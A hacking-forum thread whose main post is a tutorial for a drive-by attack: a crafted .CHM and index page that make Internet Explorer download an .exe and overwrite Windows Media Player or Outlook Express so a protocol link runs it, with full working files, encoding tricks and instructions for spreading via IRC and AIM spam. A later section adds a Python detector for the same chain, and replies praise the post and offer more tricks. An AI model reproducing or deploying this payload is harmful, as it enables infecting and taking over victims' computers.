crash3rzz
Internet Explorer - WMPlayer - [.CHM] Explained

Well, first of all this is based on those people that we see spamming
around on IRC, AIM or whatever... Basically the one that I am going to explain
is meant to execute through [Windows Media Player],
so only people that have WMPlayer installed will be affected,
but of course there are a lot of ways to get people infected, and they won't recognize it.
We even tested running a .vbs script, which could be a crypted worm...
At the bottom, I'll show another example, executing through [Outlook Express].

So first you will need to create a few files to make the .chm file:
- .HHC = Table of Contents
- .HHK = Help Index
- .HTM = Your .HTM; this one is the actual exploit, inside the .CHM

We will need one tool; I found it easy to use: http://htm2chm.by.ru/

This is an example of the files inside the .CHM; you can edit them and
compile with the program above.

These files are decompiled from the .CHM.
After you edit them, you must compile with the tool!

exploit.HHC
CODE

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML><HEAD><meta name="GENERATOR" content="Gezehua&reg; Visual CHM V4.1 "><!-- Sitemap 1.0 --></head>
<body>
<OBJECT type="text/site properties">
<param name="FrameName" value="right">
<param name="ImageType" value="Folder">
<param name="Window Styles" value="0x627">
<param name="Foreground" value="0x80000008">
<param name="Background" value="0xFFFFFF">
<param name="Font" value="MS Sans Serif,9,0">
</OBJECT>
<UL>
<LI> <OBJECT type="text/sitemap">
<param name="Name" value="exploit">
<param name="Local" value="exploit.htm">
<param name="ImageNumber" value="1">
</OBJECT>
</UL>
</BODY></HTML>


exploit.HHK
CODE

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML><HEAD><meta name="GENERATOR" content="http://www.vchm.com/&reg; Visual CHM V4.1 "><!-- Sitemap 1.0 --></head>
<body>
<OBJECT type="text/site properties">
</OBJECT>
<UL>
<LI><OBJECT type="text/sitemap">
<param name="Keyword" value="EXPLOIT">
<param name="Local" value="exploit.htm">
</OBJECT>
</UL></BODY></HTML>


These are the libraries for the .CHM file.

Now the .HTM to download/execute the file.
It's not the best example, I took it from some site.
I'll show you real ones at the bottom of the note.

CODE


<script language="vbscript">
   Function Exists(filename)
       On Error Resume Next
       LoadPicture(filename)
       Exists = Err.Number =  481
   End Function    
</script>

<script language="javascript">

   wmplayerpaths= [
           "C:\\Programmer\\Windows Media Player\\wmplayer.exe",
           "C:\\Program\\Windows Media Player\\wmplayer.exe",
           "C:\\Programme\\Windows Media Player\\wmplayer.exe",
           "C:\\Programmi\\Windows Media Player\\wmplayer.exe",
           "C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
           "C:\\Programas\\Windows Media Player\\wmplayer.exe",
           "C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe",
           "C:\\Program Files\\Windows Media Player\\wmplayer.exe"
          ];
   
   for (i=0;i<wmplayerpaths.length;i++) {
       wmplayerpath = wmplayerpaths[i];
       if (Exists(wmplayerpath))
           break;
   }

   function getPath(url) {
       start = url.indexOf('http:')
       end = url.indexOf('EXPLOIT.CHM')
       return url.substring(start, end);
   }
   
   payloadURL = getPath(location.href)+'yourfile.exe'; // must be in the same dir as the .chm file, in this example
   
   var x = new ActiveXObject("Microsoft.XMLHTTP");
   x.Open("GET",payloadURL,0);
   x.Send();
   
   var s = new ActiveXObject("ADODB.Stream");
   s.Mode = 3;
   s.Type = 1;
   s.Open();
   s.Write(x.responseBody);

   s.SaveToFile(wmplayerpath,2);
   location.href = "mms://";
   
</script>


So edit whatever you've got to edit. I bound a .rar file with this so you can take a look.
If you get an error, it means you're doing something wrong, as the files are rared.
Works 100%, anyhow figure it out yourself.
You don't have to back up anything, WMPlayer backs itself out just like some other Windows files.

Ex1 - Outlook Express..

CODE

var x = new ActiveXObject("Microsoft.XMLHTTP");

x.Open("GET", "http://****/****.exe",0);

x.Send();
var s = new ActiveXObject("ADODB.Stream");

s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Outlook Express\\msimn.exe",2);
location.href = "mailto:";

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp", "_media");
setTimeout("doit()", 50000);


Ex2 - Windows Media Player..

CODE

var x = new ActiveXObject("Microsoft.XMLHTTP");

x.Open("GET", "http://*****/****.exe",0);

x.Send();

var s = new ActiveXObject("ADODB.Stream");

s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";  

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp", "_media");
setTimeout("doit()", 5000);


If you're a good javascripter, it's easier for you :>

This is the main.htm file for your website [INDEX]
CODE


<textarea id="code" style="display:none;">
   <object data="ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm"

type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
   

document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('exploit.htm'))));
</script>


Folder Structure:

CODE

     Compiled:
             |  - exploit.chm
             |  - exploit.htm <- website index
             |  - yourfile.exe
               ---------------------
  De-Compiled:
             |  - exploit.hhc
             |  - exploit.hhk
             |  - exploit.htm
               ---------------------

  Don't confuse the .htm's: one is the index, one is the exploit.


Disabling the exploit so it can't infect you? Simple...

CODE

.uninstall [WMPlayer]
.dont use [IE] / Uninstall
.wget hxxp://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.6/mozilla-win32-1.6-installer.exe

.Now AV Picks this .chm exploit up, but only these;)


~ D0minko
EXPLOiTED
w00000000000000000000000000000000000tttttttttt
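The post shows two artefacts a responder would meet when triaging this: the decompiled .hhc/.hhk sitemaps that tell you which .htm a .chm opens, and the .htm/index script that fetches a binary with Microsoft.XMLHTTP, writes it over a program's .exe with ADODB.Stream.SaveToFile, and then fires the matching protocol handler (mms:, mailto:) or loads the .chm through an ms-its:mhtml: object. The Python below is an added example, not the poster's code: sitemap_entries() pulls the Name/Local pairs out of a sitemap, and scan_source() scores HTML/JS text for that download-and-overwrite chain, undoing the %2f and escaped-quote encoding that the post's preparecode() applies so the encoded form is still caught. The indicator names, weights, verdict thresholds and all sample inputs (including the example.invalid URL) are constructed for this example.

```python
"""Triage helpers for the IE / HTML Help pattern described in the post.

Added example; not the post's code. Two checks:
  * sitemap_entries(): Name/Local pairs from a decompiled .hhc/.hhk sitemap,
    so you can see which .htm a .chm will open.
  * scan_source(): score an HTML/JS body for the download-and-overwrite chain
    (XMLHTTP fetch -> ADODB.Stream.SaveToFile onto a program's .exe ->
    protocol-handler trigger) and for the ms-its:mhtml: loader.
Indicator names, weights and sample inputs are constructed for this example.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# (name, pattern, weight); the combination matters more than any single hit.
INDICATORS = [
    ("xmlhttp_fetch",    re.compile(r"ActiveXObject\s*\(\s*[\"']Microsoft\.XMLHTTP[\"']", re.I), 1),
    ("remote_exe_fetch", re.compile(r"\.Open\s*\(\s*[\"']GET[\"']\s*,\s*[\"']https?://[^\"']*\.exe[\"']", re.I), 2),
    ("adodb_stream",     re.compile(r"ActiveXObject\s*\(\s*[\"']ADODB\.Stream[\"']", re.I), 2),
    ("save_to_exe",      re.compile(r"SaveToFile\s*\(\s*[\"'][^\"']*?\.exe[\"']", re.I), 3),
    ("save_to_var",      re.compile(r"SaveToFile\s*\(\s*[A-Za-z_]\w*\s*,", re.I), 2),
    ("handler_trigger",  re.compile(r"location\.href\s*=\s*[\"'](?:mms|mailto):", re.I), 2),
    ("ms_its_object",    re.compile(r"ms-its:mhtml:", re.I), 3),
    ("file_js_eval",     re.compile(r"file:javascript:eval", re.I), 2),
]
OVERWRITE_RE = re.compile(r"SaveToFile\s*\(\s*[\"']([^\"']*?\.exe)[\"']", re.I)
SITEMAP_OBJ_RE = re.compile(r'<OBJECT\s+type="text/sitemap">(.*?)</OBJECT>', re.I | re.S)
PARAM_RE = re.compile(r'<param\s+name="([^"]+)"\s+value="([^"]*)"', re.I)


@dataclass
class ScanResult:
    score: int = 0
    hits: list = field(default_factory=list)                 # indicator names, in INDICATORS order
    overwritten_targets: list = field(default_factory=list)  # literal .exe paths passed to SaveToFile


def normalise(text: str) -> str:
    """Undo the post's preparecode() encoding: "/" -> "%2f" and backslash-escaped quotes."""
    body = unquote(text)
    return re.sub(r"\\+(['\"])", r"\1", body)


def scan_source(text: str) -> ScanResult:
    body = normalise(text)
    result = ScanResult()
    for name, pattern, weight in INDICATORS:
        if pattern.search(body):
            result.hits.append(name)
            result.score += weight
    for m in OVERWRITE_RE.finditer(body):
        # JS source doubles backslashes in string literals; collapse them for reporting.
        result.overwritten_targets.append(m.group(1).replace("\\\\", "\\"))
    return result


def verdict(result: ScanResult) -> str:
    """'malicious' needs the stream object plus two links of the overwrite chain."""
    chain = {"xmlhttp_fetch", "remote_exe_fetch", "save_to_exe", "save_to_var", "handler_trigger"}
    if "adodb_stream" in result.hits and len(chain & set(result.hits)) >= 2:
        return "malicious"
    if "ms_its_object" in result.hits or "file_js_eval" in result.hits or result.score >= 3:
        return "suspicious"
    return "clean"


def sitemap_entries(hhc_text: str) -> list:
    """One {param: value} dict per sitemap entry in a decompiled .hhc/.hhk."""
    return [dict(PARAM_RE.findall(obj.group(1))) for obj in SITEMAP_OBJ_RE.finditer(hhc_text)]


# --- constructed samples (condensed from the shapes shown in the post) ---
SAMPLE_HHC = """<UL><LI> <OBJECT type="text/sitemap">
<param name="Name" value="exploit">
<param name="Local" value="exploit.htm">
<param name="ImageNumber" value="1">
</OBJECT></UL>"""

SAMPLE_WMP = r"""var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://example.invalid/payload.exe", 0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);
location.href = "mms://";"""

# Same chain after preparecode(): quotes escaped, "/" -> "%2f", target held in a variable.
SAMPLE_ENCODED = (r"var x=new ActiveXObject(\'Microsoft.XMLHTTP\');"
                  r"x.Open(\'GET\',\'http:%2f%2fexample.invalid%2fpayload.exe\',0);x.Send();"
                  r"var s=new ActiveXObject(\'ADODB.Stream\');s.Mode=3;s.Type=1;s.Open();"
                  r"s.Write(x.responseBody);s.SaveToFile(target,2);location.href=\'mailto:\';")

SAMPLE_INDEX = r'''<object data="ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm" type="text/x-scriptlet"></object>'''

SAMPLE_BENIGN = """var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET", "/api/status.json", true);
x.send();"""

if __name__ == "__main__":
    print("sitemap:", sitemap_entries(SAMPLE_HHC))
    for label, sample in [("wmp", SAMPLE_WMP), ("encoded", SAMPLE_ENCODED),
                          ("index", SAMPLE_INDEX), ("benign", SAMPLE_BENIGN)]:
        r = scan_source(sample)
        print(f"{label:8} {verdict(r):10} score={r.score:2} hits={r.hits} targets={r.overwritten_targets}")
```

The encoded sample is the case worth noting: once the post's index page has run preparecode(), the slash-to-%2f rewrite and the quote escaping defeat a naive substring match for "http://" or "mms://", which is why normalise() runs before the indicators. The literal-path indicator also misses the variable form (SaveToFile(wmplayerpath, 2) in the post's first script), so save_to_var is scored separately and overwritten_targets only reports paths that appear as string literals.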
Paul
Nice short tut, thnx
Imps2
Really nice tut

Greetz Imps2
chris105
Nice, I like it. Isn't this one patched though??
linuxwolf
Hrm... Do you lot know about the folder execution? If not, I'll paste it here.
Invision Power Board © 2001-2005 Invision Power Services, Inc.